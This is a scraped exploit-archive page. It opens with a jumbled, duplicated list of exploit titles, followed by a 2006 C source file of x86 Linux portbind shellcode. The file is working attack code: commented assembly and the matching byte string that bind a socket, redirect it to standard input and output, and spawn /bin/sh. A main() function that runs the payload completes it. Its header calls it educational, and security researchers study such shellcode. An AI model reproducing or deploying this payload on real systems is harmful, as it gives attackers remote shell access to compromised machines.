477bcbdcc0
5 new exploits phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerability Exploit phpMyNewsletter <= 0.8 (beta5) - Multiple Vulnerabilities My Book World Edition NAS Multiple Vulnerability My Book World Edition NAS - Multiple Vulnerabilities Katalog Stron Hurricane 1.3.5 - Multiple Vulnerability RFI / SQL Katalog Stron Hurricane 1.3.5 - (RFI / SQL) Multiple Vulnerabilities cmsfaethon-2.2.0-ultimate.7z Multiple Vulnerability cmsfaethon-2.2.0-ultimate.7z - Multiple Vulnerabilities DynPG CMS 4.1.0 - Multiple Vulnerability (popup.php and counter.php) DynPG CMS 4.1.0 - (popup.php and counter.php) Multiple Vulnerabilities Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerability Nucleus CMS 3.51 (DIR_LIBS) - Multiple Vulnerabilities N/X - Web CMS (N/X WCMS 4.5) Multiple Vulnerability N/X - Web CMS (N/X WCMS 4.5) - Multiple Vulnerabilities New-CMS - Multiple Vulnerability New-CMS - Multiple Vulnerabilities Edgephp Clickbank Affiliate Marketplace Script Multiple Vulnerability Edgephp Clickbank Affiliate Marketplace Script - Multiple Vulnerabilities JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerability JV2 Folder Gallery 3.1.1 - (popup_slideshow.php) Multiple Vulnerabilities i-Gallery - Multiple Vulnerability i-Gallery - Multiple Vulnerabilities My Kazaam Notes Management System Multiple Vulnerability My Kazaam Notes Management System - Multiple Vulnerabilities Omnidocs - Multiple Vulnerability Omnidocs - Multiple Vulnerabilities Web Cookbook Multiple Vulnerability Web Cookbook - Multiple Vulnerabilities KikChat - (LFI/RCE) Multiple Vulnerability KikChat - (LFI/RCE) Multiple Vulnerabilities Webformatique Reservation Manager - 'index.php' Cross-Site Scripting Vulnerability Webformatique Reservation Manager 2.4 - 'index.php' Cross-Site Scripting Vulnerability xEpan 1.0.4 - Multiple Vulnerability xEpan 1.0.4 - Multiple Vulnerabilities AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Cisco UCS Manager 2.1(1b) - Shellshock Exploit OpenSSH <= 7.2p1 - xauth Injection FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow
162 lines
No EOL
5.6 KiB
C
Executable file
162 lines
No EOL
5.6 KiB
C
Executable file
/*---------------------------------------------------------------------------*
|
|
* 100 byte Portbind shellcode *
|
|
* by Benjamin Orozco - benoror@gmail.com *
|
|
*---------------------------------------------------------------------------*
|
|
* filename: x86-linux-portbind.c *
|
|
* discription: x86-linux portbind shellcode. *
|
|
* Pretty big but excellent for educational purposes. *
|
|
* Use SET_PORT() before using the shellcode. Example: *
|
|
* *
|
|
* SET_PORT(sc, 31337); *
|
|
* *
|
|
*___________________________________________________________________________*
|
|
*---------------------------------------------------------------------------*/
|
|
|
|
/*---------------------------------------------------------------------------*
|
|
* ASM Code *
|
|
*---------------------------------------------------------------------------*
|
|
|
|
# s = socket(2, 1, 0)
|
|
push $0x66 #
|
|
pop %eax # 0x66 = socketcall
|
|
push $0x1 #
|
|
pop %ebx # socket() = 1
|
|
xor %ecx,%ecx #
|
|
push %ecx # 0
|
|
push $0x1 # SOCK_STREAM = 1
|
|
push $0x2 # AF_INET = 2
|
|
mov %esp,%ecx # Arguments
|
|
int $0x80 # EXECUTE - Now %eax have the s fileDescriptor
|
|
|
|
# bind(s [2, 64713, 0], 0x10)
|
|
xor %edx,%edx
|
|
push %edx # INADDR_ANY = 0
|
|
pushw $0xc9fc # PORT = 64713
|
|
pushw $0x2 # AF_INET = 2
|
|
mov %esp,%ecx # %ecx holds server struct
|
|
push $0x10 # sizeof(server) = 10
|
|
push %ecx # server struct
|
|
push %eax # s fileDescriptor
|
|
mov %esp,%ecx
|
|
mov %eax,%esi # now %esi holds s fileDescriptor
|
|
push $0x2 #
|
|
pop %ebx # bind() = 2
|
|
push $0x66 #
|
|
pop %eax # 0x66 = socketcall
|
|
int $0x80 # On success: %eax = 0
|
|
|
|
# listen(s, 0)
|
|
push $0x66 #
|
|
pop %eax # 0x66 = socketcall
|
|
push $0x4 #
|
|
pop %ebx # listen() = 4
|
|
int $0x80 # On success: %eax = 0
|
|
|
|
# c = accept(s, 0, 0)
|
|
xor %ecx,%ecx
|
|
push %ecx
|
|
push %ecx
|
|
push %esi # %esi = s
|
|
mov %esp,%ecx # Arguments
|
|
push $0x5 #
|
|
pop %ebx # accept() = 5
|
|
push $0x66 #
|
|
pop %eax # 0x66 = socketcall
|
|
int $0x80 # EXECUTE - Now %eax have c fileDescriptor
|
|
|
|
# dup2(c, 2) , dup2(c, 1) , dup2(c, 0)
|
|
xchg %eax,%ebx # Put c fileDescriptor on %ebx [for dup2()]
|
|
push $0x2
|
|
pop %ecx
|
|
dup_loop:
|
|
mov $0x3f,%al # dup2() = 0x3f
|
|
int $0x80
|
|
dec %ecx
|
|
jns dup_loop
|
|
|
|
# execve("/bin//sh", ["/bin//sh",NULL])
|
|
mov $0xb,%al # execve = 11d
|
|
push %edx
|
|
push $0x68732f2f
|
|
push $0x6e69622f
|
|
mov %esp,%ebx
|
|
push %edx
|
|
push %ebx
|
|
mov %esp, %ecx
|
|
int $0x80
|
|
|
|
*----------------------------------------------------------------------------*/
|
|
|
|
char sc[] =
|
|
"\x6a\x66" //push $0x66
|
|
"\x58" //pop %eax
|
|
"\x6a\x01" //push $0x1
|
|
"\x5b" //pop %ebx
|
|
"\x31\xc9" //xor %ecx,%ecx
|
|
"\x51" //push %ecx
|
|
"\x6a\x01" //push $0x1
|
|
"\x6a\x02" //push $0x2
|
|
"\x89\xe1" //mov %esp,%ecx
|
|
"\xcd\x80" //int $0x80
|
|
"\x31\xd2" //xor %edx,%edx
|
|
"\x52" //push %edx
|
|
"\x66\x68\xfc\xc9" //pushw $0xc9fc //PORT
|
|
"\x66\x6a\x02" //pushw $0x2
|
|
"\x89\xe1" //mov %esp,%ecx
|
|
"\x6a\x10" //push $0x10
|
|
"\x51" //push %ecx
|
|
"\x50" //push %eax
|
|
"\x89\xe1" //mov %esp,%ecx
|
|
"\x89\xc6" //mov %eax,%esi
|
|
"\x6a\x02" //push $0x2
|
|
"\x5b" //pop %ebx
|
|
"\x6a\x66" //push $0x66
|
|
"\x58" //pop %eax
|
|
"\xcd\x80" //int $0x80
|
|
"\x6a\x66" //push $0x66
|
|
"\x58" //pop %eax
|
|
"\x6a\x04" //push $0x4
|
|
"\x5b" //pop %ebx
|
|
"\xcd\x80" //int $0x80
|
|
"\x31\xc9" //xor %ecx,%ecx
|
|
"\x51" //push %ecx
|
|
"\x51" //push %ecx
|
|
"\x56" //push %esi
|
|
"\x89\xe1" //mov %esp,%ecx
|
|
"\x6a\x05" //push $0x5
|
|
"\x5b" //pop %ebx
|
|
"\x6a\x66" //push $0x66
|
|
"\x58" //pop %eax
|
|
"\xcd\x80" //int $0x80
|
|
"\x93" //xchg %eax,%ebx
|
|
"\x6a\x02" //push $0x2
|
|
"\x59" //pop %ecx
|
|
"\xb0\x3f" //mov $0x3f,%al
|
|
"\xcd\x80" //int $0x80
|
|
"\x49" //dec %ecx
|
|
"\x79\xf9" //jns 48 <dup_loop>
|
|
"\xb0\x0b" //mov $0xb,%al
|
|
"\x52" //push %edx
|
|
"\x68\x2f\x2f\x73\x68" //push $0x68732f2f
|
|
"\x68\x2f\x62\x69\x6e" //push $0x6e69622f
|
|
"\x89\xe3" //mov %esp,%ebx
|
|
"\x52" //push %edx
|
|
"\x53" //push %ebx
|
|
"\x89\xe1" //mov %esp,%ecx
|
|
"\xcd\x80"; //int $0x80
|
|
|
|
void SET_PORT(char *buf, int port) {
|
|
*(unsigned short *)(((buf)+22)) = (port);
|
|
char tmp = buf[22];
|
|
buf[22] = buf[23];
|
|
buf[23] = tmp;
|
|
}
|
|
|
|
main(){
|
|
printf("size: %d bytes\n", strlen(sc));
|
|
|
|
SET_PORT(sc, 33333);
|
|
__asm__("call sc");
|
|
}
|
|
|
|
// milw0rm.com [2006-05-08]
|